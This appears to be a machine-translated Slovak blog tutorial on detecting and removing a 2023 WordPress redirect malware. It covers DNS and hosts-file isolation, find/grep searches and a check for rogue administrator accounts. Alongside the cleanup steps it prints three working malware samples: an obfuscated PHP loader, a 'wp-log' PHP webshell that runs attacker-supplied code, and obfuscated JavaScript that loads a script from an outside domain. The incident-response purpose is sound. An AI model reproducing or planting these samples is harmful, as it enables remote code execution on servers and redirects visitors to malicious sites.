Fix Redirect WordPress Hack 2023 (Vírus presmerovania)

WordPress je to určite najpoužívanejšia platforma CMS (Content Management System) pre blogy aj pre začínajúce internetové obchody (s modulom WooCommerce), čo ho robí najviac terčom počítačových útokov (hacking). Jedna z najpoužívanejších hackerských operácií má za cieľ presmerovať napadnutý web na iné webové stránky. Redirect WordPress Hack 2023 je relatívne nový malvér, ktorý má za následok presmerovanie celej stránky na spamové webové stránky alebo môže infikovať počítače používateľov.

Ak sa vaša stránka vyvíjala na WordPress je presmerovaný na inú stránku, potom je s najväčšou pravdepodobnosťou obeťou už známeho hacknutia presmerovania.

V tomto návode nájdete potrebné informácie a užitočné tipy, pomocou ktorých môžete devirovať webovú stránku infikovanú presmerovaním WordPress Hack (Virus Redirect). Prostredníctvom komentárov môžete získať ďalšie informácie alebo požiadať o pomoc.

Detekcia vírusu, ktorý presmeruje stránky WordPress

Náhly a neopodstatnený pokles návštevnosti webu, pokles počtu objednávok (v prípade internetových obchodov) či príjmov z reklamy sú prvými signálmi, že niečo nie je v poriadku. Detekcia "Redirect WordPress Hack 2023“ (Virus Redirect) je možné vykonať aj „vizuálne“, keď otvoríte webovú stránku a budete presmerovaní na inú webovú stránku.

Zo skúseností vyplýva, že väčšina webového malvéru je kompatibilná s internetovými prehliadačmi: Chrome, Firefox, Edge, Opera. Ak ste používateľom počítača Mac, tieto vírusy nie sú v prehliadači skutočne viditeľné Safari. Bezpečnostný systém od Safari ticho blokovať tieto škodlivé skripty.

Čo robiť, ak máte infikovanú webovú stránku Redirect WordPress Hack

Dúfam, že prvým krokom nebude panika alebo odstránenie webu. Ani infikované alebo vírusové súbory by sa nemali najskôr odstraňovať. Obsahujú cenné informácie, ktoré vám môžu pomôcť pochopiť, kde došlo k narušeniu bezpečnosti a čo ovplyvnilo vírus. Modus operandi.

Zatvorte web pre verejnosť.

Ako zatvoríte vírusovú webovú stránku pre návštevníkov? Najjednoduchšie je použiť správcu DNS a odstrániť IP pre "A" (názov domény) alebo definovať neexistujúcu IP. Návštevníci webových stránok tak budú pred tým chránení redirect WordPress hack čo ich môže priviesť k vírusovým alebo SPAMovým webovým stránkam.

Ak používate CloudFlare ako správca DNS sa prihlásite do účtu a odstránite záznamy DNS "A“ pre názov domény. Doména zasiahnutá vírusom teda zostane bez IP adresy a nebude už prístupná z internetu.

Skopírujete IP webovú stránku a „nasmerujete“ ju tak, aby ste sa k nej dostali len vy. Z vášho počítača.

Ako zmeniť skutočnú IP webovej stránky na počítačoch Windows?

Táto metóda sa často používa na zablokovanie prístupu na určité webové stránky úpravou súboru „hosts“.

1. Otvoríte Notepad alebo iný textový editor (s právami administrator) a upravte súbor "hosts". Nachádza sa v:

C:\Windows\System32\drivers\etc\hosts

2. V súbore „hosts“ pridajte „route“ k skutočnej IP vašej webovej stránky. Vyššie vymazaná IP zo správcu DNS.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Uložte súbor a prejdite na webovú stránku v prehliadači.

Ak sa webová stránka neotvorí a v súbore „hosts“ ste nič nepokazili, s najväčšou pravdepodobnosťou ide o vyrovnávaciu pamäť DNS.

Vymazanie vyrovnávacej pamäte DNS v operačnom systéme Windows, OTVORENÉ Command Prompt, kde spustíte príkaz:

ipconfig /flushdns

Ako zmeniť skutočnú IP webovej stránky na počítačoch Mac / MacKniha?

Pre používateľov počítača Mac je o niečo jednoduchšie zmeniť skutočnú IP webovej stránky.

1. Otvorte pomôcku Terminal.

2. Spustite príkazový riadok (na spustenie vyžaduje systémové heslo):

sudo nano /etc/hosts

3. Rovnako ako pri počítačoch Windows, pridajte skutočnú IP doménu.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Uložte zmeny. Ctrl+X (y).

Po „nasmerovaní“ ste jedinou osobou, ktorá má prístup k infikovanej webovej lokalite Redirect WordPress Hack.

Úplná záloha webových stránok – súborov a databázy

Aj keď je infikovaný „redirect WordPress hack“, odporúča sa urobiť všeobecnú zálohu celej webovej stránky. Súbory a databáza. Možno by ste si mohli uložiť aj lokálnu kópiu oboch súborov public / public_html ako aj databázu.

Identifikácia infikovaných súborov a súborov, ktoré boli zmenené Redirect WordPress Hack 2023

Hlavné cieľové súbory WordPress existujú index.php (v koreni), header.php, index.php şi footer.php témy WordPress aktíva. Manuálne skontrolujte tieto súbory a identifikujte škodlivý kód alebo malvérový skript.

V roku 2023 sa objavil vírus typu „Redirect WordPress Hack“vložiť index.php kód formulára:

(Neodporúčam spúšťať tieto kódy!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Dekódované, toto škodlivý skript je to v podstate dôsledok infikovania webovej stránky WordPress. Za malvérom nie je skript, ale skript, ktorý umožňuje presmerovať infikovanú webovú stránku. Ak dekódujeme vyššie uvedený skript, dostaneme:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

Na identifikáciu všetkých súborov na serveri, ktoré obsahujú tento kód, je dobré mať prístup SSH na server na spustenie príkazových riadkov kontroly a správy súborov Linux.

Súvisiace: Ako zistiť, či je váš blog infikovaný alebo nie, s pomocou Google Search , (WordPress Vírus)

Nižšie sú uvedené dva príkazy, ktoré sú určite užitočné na identifikáciu nedávno upravených súborov a súborov, ktoré obsahujú určitý kód (reťazec).

Ako vidíš Linux Zmenili sa súbory PHP za posledných 24 hodín alebo v inom časovom rámci?

Objednať "find“ sa veľmi jednoducho používa a umožňuje prispôsobenie na nastavenie časového obdobia, cesty, v ktorej sa vyhľadávanie uskutočňuje, a typu súborov.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

Vo výstupe dostanete informácie o dátume a čase úpravy súboru, oprávneniach na zápis/čítanie/spustenie (chmod) a do ktorej skupiny/používateľa patrí.

Ak chcete skontrolovať pred viac dňami, zmeňte hodnotu "-mtime -1“ alebo použite „-mmin -360“ na minúty (6 hodín).

Ako hľadať kód (reťazec) v súboroch PHP, Java?

Príkazový riadok "nájsť", ktorý vám umožňuje rýchlo nájsť všetky súbory PHP alebo Java, ktoré obsahujú určitý kód, je nasledujúci:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

Príkaz vyhľadá a zobrazí súbory .php şi .js obsahujúce "uJjBRODYsU".

Pomocou dvoch vyššie uvedených príkazov veľmi jednoducho zistíte, ktoré súbory boli v poslednej dobe upravené a ktoré obsahujú škodlivý kód.

Odstraňuje škodlivý kód z upravených súborov bez ohrozenia správneho kódu. V mojom scenári bol malvér umiestnený pred otvorením <head>.

Pri vykonávaní prvého príkazu "nájsť" je veľmi možné objaviť na serveri nové súbory, ktoré nie sú vaše WordPress ani tam dať vy. Súbory patriace k typu vírusu Redirect WordPress Hack.

V scenári, ktorý som skúmal, súbory formulára „wp-log-nOXdgD.php". Ide o „spawn“ súbory, ktoré obsahujú aj malvérový kód používaný vírusom na presmerovanie.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

Účel súborov typu "wp-log-*“ je šírenie vírusu redirect hack na iné webové stránky hosťované na serveri. Ide o malvérový kód typu „webshell” zložený z a základná časť (v ktorej sú definované niektoré šifrované premenné) a o exekučný oddiel prostredníctvom ktorého sa útočník pokúša načítať a spustiť škodlivý kód v systéme.

Ak existuje premenná POST s názvom 'bh“ a jeho šifrovaná hodnota MD5 rovná sa "8f1f964a4b4d8d1ac3f0386693d28d03“, potom sa zdá, že skript zapisuje šifrovaný obsah base64 inej premennej s názvom 'b3' v dočasnom súbore a potom sa pokúsi zahrnúť tento dočasný súbor.

Ak existuje premenná POST alebo GET s názvom 'tick', skript odpovie hodnotou MD5 reťazca"885".

Ak chcete identifikovať všetky súbory na serveri, ktoré obsahujú tento kód, vyberte reťazec, ktorý je bežný, a potom spustite príkaz „find“ (podobné ako vyššie). Odstráňte všetky súbory obsahujúce tento škodlivý kód.

Bezpečnostná chyba bola zneužitá Redirect WordPress Hack

S najväčšou pravdepodobnosťou tento vírus presmerovania prichádza cez zneužitia administrátora WordPress alebo identifikáciou a zraniteľný doplnok čo umožňuje pridávanie používateľov s oprávneniami administrator.

Pre väčšinu webových stránok postavených na platforme WordPress to je možné úprava súborov tém alebo doplnkovz administračného rozhrania (Dashboard). Osoba so zlými úmyslami teda môže pridať malvérový kód do súborov tém a vygenerovať skripty uvedené vyššie.

Príkladom takéhoto škodlivého kódu je tento:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript identifikované v hlavičke témy WordPress, ihneď po otvorení etikety <head>.

Je dosť ťažké rozlúštiť tento JavaScript, ale je zrejmé, že dopytuje inú webovú adresu, odkiaľ s najväčšou pravdepodobnosťou načítava ďalšie skripty na vytvorenie súborov "wp-log-*“, o ktorom som hovoril vyššie.

Nájdite a odstráňte tento kód zo všetkých súborov PHP postihnutých.

Pokiaľ som mohol povedať, tento kód bol ručne pridané novým používateľom s oprávneniami správcu.

Ak chcete zabrániť pridávaniu škodlivého softvéru z ovládacieho panela, je najlepšie vypnúť možnosť úprav WordPress Témy / doplnky z ovládacieho panela.

Upravte súbor wp-config.php a pridajte riadky:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

Po vykonaní tejto zmeny žiadny používateľ WordPress už nebudete môcť upravovať súbory z ovládacieho panela.

Skontrolujte používateľov s rolou Administrator

Nižšie je uvedený SQL dotaz, ktorý môžete použiť na vyhľadávanie používateľov s rolou administrator v platforme WordPress:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

Tento dotaz vráti všetkých používateľov v tabuľke wp_users ktorý pridelil úlohu administrator. Dopyt sa vykoná aj pre tabuľku wp_usermeta hľadať v meta 'wp_capabilities', ktorý obsahuje informácie o používateľských rolách.

Ďalšou metódou je identifikovať ich podľa: Dashboard → Users → All Users → Administrator. Existujú však postupy, pomocou ktorých môže byť používateľ skrytý na paneli Dashboard. Takže najlepší spôsob, ako vidieť používateľov “Administrator"v WordPress je príkaz SQL uvedený vyššie.

V mojom prípade som v databáze identifikoval používateľa s menom "wp-import-user". Dosť sugestívne.

Tiež tu môžete vidieť dátum a čas používateľa WordPress bol vytvorený. ID užívateľa je tiež veľmi dôležité, pretože prehľadáva protokoly servera. Týmto spôsobom môžete vidieť všetku aktivitu tohto používateľa.

Odstrániť používateľov s rolou administrator čo potom nepoznáš zmeniť heslá všetkým administratívnym používateľom. Redaktor, autor, Administrator.

Zmeňte heslo používateľa databázy SQL dotknutej webovej stránky.

Po vykonaní týchto krokov je možné webovú stránku reštartovať pre všetkých používateľov.

Majte však na pamäti, že to, čo som uviedol vyššie, je jedným z možno tisícok scenárov, v ktorých je webová stránka infikovaná Redirect WordPress Hack v roku 2023.

Ak bola vaša webová stránka infikovaná a potrebujete pomoc alebo ak máte nejaké otázky, sekcia komentárov je otvorená.